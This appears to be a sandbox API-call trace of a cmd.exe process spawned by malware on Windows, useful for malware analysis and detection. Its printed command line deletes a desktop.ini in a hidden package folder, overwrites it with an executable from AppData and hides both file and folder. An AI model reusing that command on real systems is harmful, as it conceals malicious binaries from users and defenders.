lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x0, lpData=0x12e8d0*=0x1, lpcbData=0x12e8c8*=0x1000) returned 0x2 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x0, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x9, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.534] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x4, lpData=0x12e8d0*=0x9, lpcbData=0x12e8c8*=0x4) returned 0x0 [0205.535] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e8cc, lpData=0x12e8d0, lpcbData=0x12e8c8*=0x1000 | out: lpType=0x12e8cc*=0x0, lpData=0x12e8d0*=0x9, lpcbData=0x12e8c8*=0x1000) returned 0x2 [0205.535] RegCloseKey (hKey=0x40) returned 0x0 [0205.535] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a7 [0205.535] srand (_Seed=0x5b8863a7) [0205.535] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"" [0205.535] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"" [0205.535] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.535] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c1c10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0205.535] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0205.535] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.535] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.535] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0205.535] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0205.535] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0205.535] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0205.535] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0205.536] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0205.536] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0205.536] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0205.536] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0205.536] GetEnvironmentStringsW () returned 0x2c2600* [0205.536] FreeEnvironmentStringsW (penv=0x2c2600) returned 1 [0205.536] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.536] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.536] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0205.536] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0205.536] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0205.536] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0205.536] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0205.536] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0205.536] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0205.536] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0205.536] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f690 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.536] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f690, lpFilePart=0x12f68c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f68c*="Desktop") returned 0x18 [0205.536] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.536] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f40c | out: lpFindFileData=0x12f40c) returned 0x2c0c90 [0205.536] FindClose (in: hFindFile=0x2c0c90 | out: hFindFile=0x2c0c90) returned 1 [0205.537] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f40c | out: lpFindFileData=0x12f40c) returned 0x2c0c90 [0205.537] FindClose (in: hFindFile=0x2c0c90 | out: hFindFile=0x2c0c90) returned 1 [0205.537] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f40c | out: lpFindFileData=0x12f40c) returned 0x2c0c90 [0205.537] FindClose (in: hFindFile=0x2c0c90 | out: hFindFile=0x2c0c90) returned 1 [0205.537] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.537] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0205.537] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0205.537] GetEnvironmentStringsW () returned 0x2c04b0* [0205.537] FreeEnvironmentStringsW (penv=0x2c04b0) returned 1 [0205.537] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.538] GetConsoleOutputCP () returned 0x1b5 [0205.538] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.538] GetUserDefaultLCID () returned 0x409 [0205.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0205.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f7d0, cchData=128 | out: lpLCData="0") returned 2 [0205.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f7d0, cchData=128 | out: lpLCData="0") returned 2 [0205.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f7d0, cchData=128 | out: lpLCData="1") returned 2 [0205.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0205.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0205.539] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0205.539] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0205.540] GetConsoleTitleW (in: lpConsoleTitle=0x2b0ad0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.540] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.540] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0205.540] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0205.540] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0205.541] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0205.541] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0205.541] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0205.541] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0205.541] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0205.541] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0205.541] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0205.543] _wcsicmp (_String1="del", _String2=")") returned 59 [0205.543] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0205.543] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0205.543] _wcsicmp (_String1="IF", _String2="del") returned 5 [0205.543] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0205.543] _wcsicmp (_String1="REM", _String2="del") returned 14 [0205.543] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0205.545] _wcsicmp (_String1="type", _String2=")") returned 75 [0205.545] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0205.545] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0205.545] _wcsicmp (_String1="IF", _String2="type") returned -11 [0205.545] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0205.545] _wcsicmp (_String1="REM", _String2="type") returned -2 [0205.545] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0205.617] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0205.617] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.622] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.623] FindClose (in: hFindFile=0x2c2560 | out: hFindFile=0x2c2560) returned 1 [0205.623] FindClose (in: hFindFile=0x2c2560 | out: hFindFile=0x2c2560) returned 1 [0205.623] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0205.623] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0205.623] GetConsoleTitleW (in: lpConsoleTitle=0x12f1f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.623] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f080, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f148 | out: lpAttributeList=0x12f080, lpSize=0x12f148) returned 1 [0205.623] UpdateProcThreadAttribute (in: lpAttributeList=0x12f080, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f140, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f080, lpPreviousValue=0x0) returned 1 [0205.623] GetStartupInfoW (in: lpStartupInfo=0x12f03c | out: lpStartupInfo=0x12f03c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0205.623] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0205.624] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f0dc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f128 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" ", lpProcessInformation=0x12f128*(hProcess=0x50, hThread=0x4c, dwProcessId=0xefc, dwThreadId=0x81c)) returned 1 [0205.630] CloseHandle (hObject=0x4c) returned 1 [0205.630] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0205.630] GetEnvironmentStringsW () returned 0x2c09e0* [0205.630] FreeEnvironmentStringsW (penv=0x2c09e0) returned 1 [0205.630] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0205.848] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f01c | out: lpExitCode=0x12f01c*=0x0) returned 1 [0205.848] CloseHandle (hObject=0x50) returned 1 [0205.848] _vsnwprintf (in: _Buffer=0x12f164, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f028 | out: _Buffer="00000000") returned 8 [0205.848] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0205.848] GetEnvironmentStringsW () returned 0x2c25b0* [0205.848] FreeEnvironmentStringsW (penv=0x2c25b0) returned 1 [0205.848] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0205.848] GetEnvironmentStringsW () returned 0x2c25b0* [0205.848] FreeEnvironmentStringsW (penv=0x2c25b0) returned 1 [0205.849] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f080 | out: lpAttributeList=0x12f080) [0205.849] GetConsoleTitleW (in: lpConsoleTitle=0x12f400, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.849] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\desktop.ini")) returned 0xffffffff [0205.849] GetLastError () returned 0x2 [0205.849] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1")) returned 0x10 [0205.849] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0205.849] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0205.850] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\desktop.ini")) returned 0xffffffff [0205.850] GetLastError () returned 0x2 [0205.850] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12eeac | out: lpConsoleScreenBufferInfo=0x12eeac) returned 1 [0205.850] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0205.878] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0205.878] GetConsoleTitleW (in: lpConsoleTitle=0x12f39c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.879] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0205.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.880] GetFileType (hFile=0x50) returned 0x1 [0205.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.880] GetFileType (hFile=0x50) returned 0x1 [0205.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.880] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] GetFileType (hFile=0x50) returned 0x1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] GetFileType (hFile=0x50) returned 0x1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] GetFileType (hFile=0x50) returned 0x1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] GetFileType (hFile=0x50) returned 0x1 [0205.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.882] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] GetFileType (hFile=0x50) returned 0x1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] GetFileType (hFile=0x50) returned 0x1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.883] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.883] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.883] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] GetFileType (hFile=0x50) returned 0x1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] GetFileType (hFile=0x50) returned 0x1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] GetFileType (hFile=0x50) returned 0x1 [0205.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.883] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] GetFileType (hFile=0x50) returned 0x1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] GetFileType (hFile=0x50) returned 0x1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] GetFileType (hFile=0x50) returned 0x1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] GetFileType (hFile=0x50) returned 0x1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] GetFileType (hFile=0x50) returned 0x1 [0205.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.884] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.884] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.885] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.885] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] GetFileType (hFile=0x50) returned 0x1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] GetFileType (hFile=0x50) returned 0x1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] GetFileType (hFile=0x50) returned 0x1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] GetFileType (hFile=0x50) returned 0x1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] GetFileType (hFile=0x50) returned 0x1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] GetFileType (hFile=0x50) returned 0x1 [0205.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.885] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 